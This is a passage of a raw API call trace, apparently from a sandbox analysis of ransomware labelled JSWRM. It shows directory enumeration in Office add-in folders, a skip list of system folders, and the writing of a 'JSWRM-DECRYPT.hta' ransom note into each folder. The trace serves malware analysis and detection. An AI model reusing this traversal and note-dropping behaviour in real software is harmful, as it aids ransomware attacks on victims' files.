nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.442] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.442] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.442] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.442] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.442] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.442] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.442] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.442] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.442] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.442] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.442] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefd8e49f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd8e49f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd8e49f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x11040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.442] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.442] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.443] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.443] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.443] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.443] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.443] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.443] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.443] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.443] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.443] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbd2face, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbd2face, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbd55d11, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2faa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.443] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.443] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.443] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.443] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.443] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.443] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.443] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.443] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.443] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.443] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.443] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf13037fa, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1329a43, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3e040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.443] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.444] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.444] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.444] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.444] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.444] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.444] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.444] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.444] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.444] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d298, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.444] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x37f90ac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37f90ac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37f90ac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaeaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.444] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.444] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.444] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.444] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.444] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.444] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.444] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.444] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.444] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.444] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0d8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.444] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x37f90ac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37f90ac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37f90ac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaeaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 0 [0123.445] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0123.445] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4692737, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x4abf9f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4abf9f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="vi", cAlternateFileName="")) returned 1 [0123.445] lstrcmpiW (lpString1="vi", lpString2=".") returned 1 [0123.445] lstrcmpiW (lpString1="vi", lpString2="..") returned 1 [0123.445] lstrcmpiW (lpString1="vi", lpString2="...") returned 1 [0123.445] lstrcmpiW (lpString1="vi", lpString2="windows") returned -1 [0123.445] lstrcmpiW (lpString1="vi", lpString2="recovery") returned 1 [0123.445] lstrcmpiW (lpString1="vi", lpString2="perflogs") returned 1 [0123.445] lstrcmpiW (lpString1="vi", lpString2="documents and settings") returned 1 [0123.445] lstrcmpiW (lpString1="vi", lpString2="$RECYCLE.BIN") returned 1 [0123.445] lstrcmpiW (lpString1="vi", lpString2="system volume information") returned 1 [0123.445] lstrcmpiW (lpString1="vi", lpString2="msocache") returned 1 [0123.445] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\vi\\jswrm-decrypt.hta")) returned 0xffffffff [0123.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.446] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\vi\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.446] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.447] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.447] CloseHandle (hObject=0x338) returned 1 [0123.448] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\vi\\jswrm-decrypt.hta")) returned 0x20 [0123.448] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\vi\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4692737, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x4abf9f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x403d6a08, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x232140 [0123.448] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.448] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4692737, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x4abf9f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x403d6a08, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.448] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.448] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.448] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x403d6a08, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x403d6a08, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x403d6a08, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.448] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.448] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc34bb5b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc34bb5b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc34bb5b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x10040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.448] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.449] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.449] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.449] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.449] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.449] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.449] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.449] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.449] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.449] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.449] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4abf9f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4abf9f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4abf9f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x29aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.449] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.449] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.449] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.449] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.449] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.449] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.449] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.449] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.449] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.449] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.449] WideCharToMultiByte (in: 